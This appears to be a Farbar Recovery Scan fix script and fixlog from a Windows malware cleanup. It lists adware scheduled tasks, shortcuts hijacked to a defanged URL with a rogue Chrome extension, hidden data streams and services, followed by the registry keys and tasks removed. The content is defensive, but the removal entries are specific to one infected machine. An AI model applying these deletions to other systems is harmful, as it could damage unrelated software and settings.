Task: {594E1451-AFDB-4287-B1B3-D18EB2E0BF2E} - System32\Tasks\Online Application v209 => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: {5C4EA77F-8CF5-41DB-B883-F1EA1642C5D4} - System32\Tasks\Online Application Guard => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian.exe <==== ATTENTION
Task: {60A433A8-9F5A-4026-8454-75EE1943CDC9} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {637E2C13-5027-47A7-9107-E3324F1213E8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {687ECE0D-CF66-42BC-9951-3C12D3BC5EC2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {6E832262-BAD8-40D2-8D28-EE2E7D2E5622} - System32\Tasks\{E6D23253-1BC6-4DC7-972F-F9F2F5596439} => pcalua.exe -a C:\Users\Y\AppData\Roaming\Kubity\VRSkope\uninstaller.exe -c /uninstall
Task: {70412D1E-3AB2-41BF-A076-334CC2DCD958} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {7D21B362-DCCB-4E9F-98C3-A48D802EB6A5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {7FB0B89D-2E9D-4C77-B67D-BF6202830584} - \Lenovo\Lenovo Service Bridge\S-1-5-21-732140370-2414468103-320680840-1003 -> No File <==== ATTENTION
Task: {8232A377-31D7-44A1-BEBD-5D432EB975C9} - System32\Tasks\KuaiZip_Update => C:\PROGRA~1\88D7~1\X86\Update.exe <==== ATTENTION
Task: {8960C2FC-FDF0-434A-A0B0-120144BAF5AD} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {97DC44DE-44A4-4F58-BFBF-538BBA4C7AC4} - System32\Tasks\Traffic Exchange v209 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: {ABA63C90-4A6A-46DA-B08D-30E3737A795A} - System32\Tasks\PC SpeedUp Service Deactivator => C:\Program Files (x86)\Zrychleni Pocitace\PCSUSD.exe <==== ATTENTION
Task: {B48554ED-C19D-44C8-B156-0560568E355A} - System32\Tasks\Online Application v209 Guard => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: {B88028EE-3EF2-4580-87C4-6C9F1C9D131C} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe <==== ATTENTION
Task: {C37E0EB4-7A29-41AF-A618-EE8EADD5C406} - System32\Tasks\Traffic Exchange v2 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: {C94C4D52-6DEC-4FAE-B24D-C774982AB815} - System32\Tasks\Traffic Exchange v209 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: {CC885471-1F4C-4BF4-84B7-2D7DFC153F9D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {D57279A9-985E-41AB-A6B9-C663392DA97D} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {DD5F2E28-31C3-48D2-B3B1-9E15CA95A440} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {EBA869B9-6C89-4659-BF10-1BC8EB3D6070} - System32\Tasks\Online Application v2 Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
Task: {EF2A4DCC-19C7-4CB0-98B5-467A61F967BC} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {FDA13CB3-67CD-49A6-A582-88C1957EE1BD} - System32\Tasks\Traffic Exchange v2 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1cfee32ff15bdf1.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-732140370-2414468103-320680840-1003Core.job => C:\Users\Y\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-732140370-2414468103-320680840-1003UA.job => C:\Users\Y\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Online Application Updater.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online Application Updater.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v2 Guard.job => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v2 Guardian.job => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v2.job => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v209 Guard.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v209 Guardian.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Online Application v209.job => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\PC SpeedUp Service Deactivator.job => C:\Program Files (x86)\Zrychleni Pocitace\PCSUSD.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange Updater.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Traffic Exchange Updater.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v2 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v2 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v2 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v209 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v209 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Traffic Exchange v209 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdater.job => <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job => <==== ATTENTION
WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION
ShortcutWithArgument: C:\Users\Y\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Y\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
ShortcutWithArgument: C:\Users\Y\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Y\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [101778]
AlternateDataStreams: C:\WINDOWS\system32\drivers:x64 [1498914]
AlternateDataStreams: C:\WINDOWS\system32\drivers:x86 [1223458]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm [0]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\ProgramData\Temp:296515B3 [352]
AlternateDataStreams: C:\ProgramData\Temp:4FC01C57 [134]
AlternateDataStreams: C:\ProgramData\Temp:78F63A0E [189]
AlternateDataStreams: C:\ProgramData\Temp:DC9AE426 [175]
AlternateDataStreams: C:\ProgramData\Temp:EC14014D [201]
HKU\S-1-5-21-732140370-2414468103-320680840-1003\...\Policies\Explorer: []
HKU\S-1-5-18\...\Run: [] => [X]
HKLM\...\Providers\vr93xp24: C:\Program Files (x86)\Narech Client\local64spl.dll
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\żěŃą\X64\KZipShell.dll -> No File
GroupPolicy: Restriction <======= ATTENTION
CHR Extension: (easychrome) - C:\Users\Y\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk [2017-03-12]
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
S2 UCBrowserSvc; "C:\Program Files (x86)\UCBrowser\Application\UCService.exe" [X]
R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ATTENTION
S3 dbx; system32\DRIVERS\dbx.sys [X]
U3 idsvc; no ImagePath
S2 KuaiZipDrive; \??\C:\WINDOWS\system32\drivers\KuaiZipDrive.sys [X]
2017-03-16 09:21 - 2017-03-16 09:22 - 00000000 ____D C:\Users\Y\AppData\Roaming\Bajipyhcch
2017-03-16 09:21 - 2017-03-16 09:22 - 00000000 ____D C:\Users\Y\AppData\Local\Vilsyghewok
2017-03-16 09:21 - 2017-03-16 09:21 - 00006062 _____ C:\WINDOWS\System32\Tasks\Narech Client
2017-03-13 14:49 - 2017-03-13 14:49 - 00000000 ____D C:\ProgramData\Microleaves
2017-03-12 14:48 - 2017-03-17 14:48 - 00000000 ____D C:\Program Files (x86)\UCBrowser
2017-03-12 14:48 - 2017-03-12 15:41 - 00000000 ____D C:\Users\Y\AppData\Roaming\Fevitionpltige
2017-03-12 14:48 - 2017-03-12 15:26 - 00000000 ____D C:\Program Files (x86)\Saaleruherty Core
2017-03-12 14:48 - 2017-03-12 14:48 - 00006088 _____ C:\WINDOWS\System32\Tasks\Saaleruherty Core
2017-03-12 14:48 - 2017-03-12 14:48 - 00005116 _____ C:\WINDOWS\System32\Tasks\Leputy
2017-03-12 14:48 - 2017-03-12 14:48 - 00003476 _____ C:\WINDOWS\System32\Tasks\UCBrowserSecureUpdater
2017-03-12 14:48 - 2017-03-12 14:48 - 00003474 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdater
2017-03-12 14:48 - 2017-03-12 14:48 - 00002624 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdaterCore
2017-03-12 14:48 - 2017-03-12 14:48 - 00000464 _____ C:\WINDOWS\Tasks\UCBrowserUpdater.job
2017-03-12 14:48 - 2017-03-12 14:48 - 00000300 _____ C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job
2017-03-12 14:48 - 2017-03-12 14:48 - 00000000 ____D C:\Users\Y\AppData\Local\UCBrowser
2017-03-12 14:48 - 2017-03-12 14:48 - 00000000 ____D C:\Users\Y\AppData\Local\Dieshfergerent
2017-03-12 14:48 - 2017-03-12 14:48 - 00000000 ____D C:\Program Files (x86)\Figasy
2017-03-12 14:47 - 2017-03-12 15:39 - 00000000 __SHD C:\Users\Y\AppData\Local\svchost
2017-03-12 14:47 - 2017-03-12 14:48 - 00000000 ____D C:\Users\Y\AppData\Roaming\UCChannel
2017-03-12 14:47 - 2017-03-12 14:47 - 00003510 _____ C:\WINDOWS\System32\Tasks\KuaiZip_Update
2017-03-12 14:47 - 2017-03-12 14:47 - 00000893 _____ C:\Users\Y\AppData\Roaming\Microsoft\Windows\Start Menu\żěŃą.lnk
2017-03-12 14:47 - 2017-03-12 14:47 - 00000000 ____D C:\Users\Y\AppData\Roaming\Softlink
2017-03-12 14:47 - 2017-03-12 14:47 - 00000000 ____D C:\Users\Y\AppData\Roaming\KuaiZip
2017-03-12 14:46 - 2017-03-12 14:52 - 00000410 _____ C:\WINDOWS\Tasks\Online Application Updater.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000396 ____H C:\WINDOWS\Tasks\Traffic Exchange Updater.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000376 _____ C:\WINDOWS\Tasks\PC SpeedUp Service Deactivator.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000364 _____ C:\WINDOWS\Tasks\Online Application v209.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000364 _____ C:\WINDOWS\Tasks\Online Application v209 Guardian.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000364 _____ C:\WINDOWS\Tasks\Online Application v209 Guard.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000354 _____ C:\WINDOWS\Tasks\Traffic Exchange v209 - 3.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000354 _____ C:\WINDOWS\Tasks\Traffic Exchange v209 - 2.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000354 _____ C:\WINDOWS\Tasks\Traffic Exchange v209 - 1.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000354 _____ C:\WINDOWS\Tasks\Online Application v2.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000354 _____ C:\WINDOWS\Tasks\Online Application v2 Guardian.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000354 _____ C:\WINDOWS\Tasks\Online Application v2 Guard.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000344 _____ C:\WINDOWS\Tasks\Traffic Exchange v2 - 3.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000344 _____ C:\WINDOWS\Tasks\Traffic Exchange v2 - 2.job
2017-03-12 14:46 - 2017-03-12 14:52 - 00000344 _____ C:\WINDOWS\Tasks\Traffic Exchange v2 - 1.job
2017-03-12 14:46 - 2017-03-12 14:46 - 00003722 _____ C:\WINDOWS\System32\Tasks\Online Application Guardian
2017-03-12 14:46 - 2017-03-12 14:46 - 00003716 _____ C:\WINDOWS\System32\Tasks\Online Application Guard
2017-03-12 14:46 - 2017-03-12 14:46 - 00003708 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Guardian
2017-03-12 14:46 - 2017-03-12 14:46 - 00003704 _____ C:\WINDOWS\System32\Tasks\Online Application
2017-03-12 14:46 - 2017-03-12 14:46 - 00003702 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Guard
2017-03-12 14:46 - 2017-03-12 14:46 - 00003690 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange
2017-03-12 14:46 - 2017-03-12 14:46 - 00003304 _____ C:\WINDOWS\System32\Tasks\Online Application Updater
2017-03-12 14:46 - 2017-03-12 14:46 - 00003284 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Updater
2017-03-12 14:46 - 2017-03-12 14:46 - 00003270 _____ C:\WINDOWS\System32\Tasks\Online Application v209 Guardian
2017-03-12 14:46 - 2017-03-12 14:46 - 00003264 _____ C:\WINDOWS\System32\Tasks\Online Application v209 Guard
2017-03-12 14:46 - 2017-03-12 14:46 - 00003256 _____ C:\WINDOWS\System32\Tasks\Online Application v2 Guardian
2017-03-12 14:46 - 2017-03-12 14:46 - 00003252 _____ C:\WINDOWS\System32\Tasks\Online Application v209
2017-03-12 14:46 - 2017-03-12 14:46 - 00003250 _____ C:\WINDOWS\System32\Tasks\Online Application v2 Guard
2017-03-12 14:46 - 2017-03-12 14:46 - 00003246 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 3
2017-03-12 14:46 - 2017-03-12 14:46 - 00003246 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 2
2017-03-12 14:46 - 2017-03-12 14:46 - 00003246 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 1
2017-03-12 14:46 - 2017-03-12 14:46 - 00003238 _____ C:\WINDOWS\System32\Tasks\Online Application v2
2017-03-12 14:46 - 2017-03-12 14:46 - 00003232 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 3
2017-03-12 14:46 - 2017-03-12 14:46 - 00003232 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 2
2017-03-12 14:46 - 2017-03-12 14:46 - 00003232 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 1
2017-03-12 14:46 - 2017-03-12 14:46 - 00002834 _____ C:\WINDOWS\System32\Tasks\PC SpeedUp Service Deactivator
2017-03-12 14:46 - 2017-03-12 14:46 - 00000000 ____D C:\Users\Y\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk
2017-03-12 14:46 - 2017-03-12 14:46 - 00000000 ____D C:\Program Files (x86)\Microleaves
2017-03-12 14:45 - 2017-03-12 14:46 - 00000000 ____D C:\Users\Y\AppData\Roaming\Microleaves
2017-03-12 14:45 - 2017-03-12 14:45 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
2017-03-12 14:45 - 2017-03-12 14:45 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
CMD: dir "C:\Windows\Inf" /AD
CMD: dir "C:\PROGRA~1"
CMD: dir "C:\PROGRA~2"
CMD: dir "C:\PROGRA~3"
CMD: dir "%localappdata%"
CMD: dir "%appdata%"
Hosts:
EmptyTemp:
End

*****************

Restore point was successfully created.
Processes closed successfully.

========================= File: C:\Program Files (x86)\Qumase\veraph.exe ========================

"C:\Program Files (x86)\Qumase\veraph.exe" => not found.
====== End of File: ======

========================= Folder: C:\Program Files (x86)\Qumase ========================

not found.

====== End of Folder: ======

"C:\Program Files (x86)\Qumase" => not found.

========================= File: C:\Program Files (x86)\Narech Client\local64spl.dll ========================

"C:\Program Files (x86)\Narech Client\local64spl.dll" => not found.
====== End of File: ======

========================= Folder: C:\Program Files (x86)\Narech Client ========================

not found.

====== End of Folder: ======

"C:\Program Files (x86)\Narech Client" => not found.
HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741} => key removed successfully
HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856} => key removed successfully
HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4} => key removed successfully
HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3} => key removed successfully
HKU\S-1-5-21-732140370-2414468103-320680840-1003_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{05891592-DA8C-4830-A4CE-8996EEC5D8F7} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{05891592-DA8C-4830-A4CE-8996EEC5D8F7} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{08B1BFE0-A287-440E-ABF5-97102858AAAC} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{08B1BFE0-A287-440E-ABF5-97102858AAAC} => key removed successfully
C:\WINDOWS\System32\Tasks\Online Application Guardian => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application Guardian => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{15AF3504-5586-449C-B0C2-1B39FC7ECBC9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{15AF3504-5586-449C-B0C2-1B39FC7ECBC9} => key removed successfully
C:\WINDOWS\System32\Tasks\Traffic Exchange Updater => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Traffic Exchange Updater => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1ED60EC4-DB2C-43AA-A9E5-4034852D6958} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1ED60EC4-DB2C-43AA-A9E5-4034852D6958} => key removed successfully
C:\WINDOWS\System32\Tasks\Online Application v2 => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application v2 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{22202710-1AF7-40F8-A659-8D97D8F517C1} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{22202710-1AF7-40F8-A659-8D97D8F517C1} => key removed successfully
C:\WINDOWS\System32\Tasks\Traffic Exchange Guard => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Traffic Exchange Guard => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{269CB3E0-15C8-49AE-AD53-F2068CF54A1F} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{269CB3E0-15C8-49AE-AD53-F2068CF54A1F} => key removed successfully
C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 1 => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Traffic Exchange v209 - 1 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2BBF7288-3E12-4665-BEA3-1ED07E3A65D0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2BBF7288-3E12-4665-BEA3-1ED07E3A65D0} => key removed successfully
C:\WINDOWS\System32\Tasks\Traffic Exchange Guardian => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Traffic Exchange Guardian => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2D22FEB1-8880-4B50-98D7-BA9EE8C4D598} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2D22FEB1-8880-4B50-98D7-BA9EE8C4D598} => key removed successfully
C:\WINDOWS\System32\Tasks\Online Application => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2F4108A1-4B17-4E62-891E-C884B23341DA} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F4108A1-4B17-4E62-891E-C884B23341DA} => key removed successfully
C:\WINDOWS\System32\Tasks\Online Application Updater => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application Updater => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{30FD3AAB-EDB1-406C-8B7F-E9DAA645B2F2} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{30FD3AAB-EDB1-406C-8B7F-E9DAA645B2F2} => key removed successfully
C:\WINDOWS\System32\Tasks\Leputy => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Leputy => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3D4C177E-EDF3-4144-9E73-BCAA023F6B47} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3D4C177E-EDF3-4144-9E73-BCAA023F6B47} => key removed successfully
C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 1 => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Traffic Exchange v2 - 1 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3E9D7AA7-C043-4FB6-94E4-0928BC05ABB0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3E9D7AA7-C043-4FB6-94E4-0928BC05ABB0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3F902269-43AB-485A-8AE0-950ABAB1FF27} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3F902269-43AB-485A-8AE0-950ABAB1FF27} => key removed successfully
C:\WINDOWS\System32\Tasks\Online Application v209 Guardian => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application v209 Guardian => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4CEE9A2C-3FE5-48C6-992C-4BE15D1E2AF5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4CEE9A2C-3FE5-48C6-992C-4BE15D1E2AF5} => key removed successfully
C:\WINDOWS\System32\Tasks\Online Application v2 Guard => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application v2 Guard => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5461E4F9-10F8-4EAB-BBFE-4CB3FB0547C0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5461E4F9-10F8-4EAB-BBFE-4CB3FB0547C0} => key removed successfully
C:\WINDOWS\System32\Tasks\Narech Client => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Narech Client => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{55DACCAB-AEEE-4E6C-86F1-26ABE71B00E5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{55DACCAB-AEEE-4E6C-86F1-26ABE71B00E5} => key removed successfully
C:\WINDOWS\System32\Tasks\Traffic Exchange => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Traffic Exchange => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{594E1451-AFDB-4287-B1B3-D18EB2E0BF2E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{594E1451-AFDB-4287-B1B3-D18EB2E0BF2E} => key removed successfully
C:\WINDOWS\System32\Tasks\Online Application v209 => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application v209 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5C4EA77F-8CF5-41DB-B883-F1EA1642C5D4} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5C4EA77F-8CF5-41DB-B883-F1EA1642C5D4} => key removed successfully
C:\WINDOWS\System32\Tasks\Online Application Guard => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application Guard => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{60A433A8-9F5A-4026-8454-75EE1943CDC9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{60A433A8-9F5A-4026-8454-75EE1943CDC9} => key removed successfully
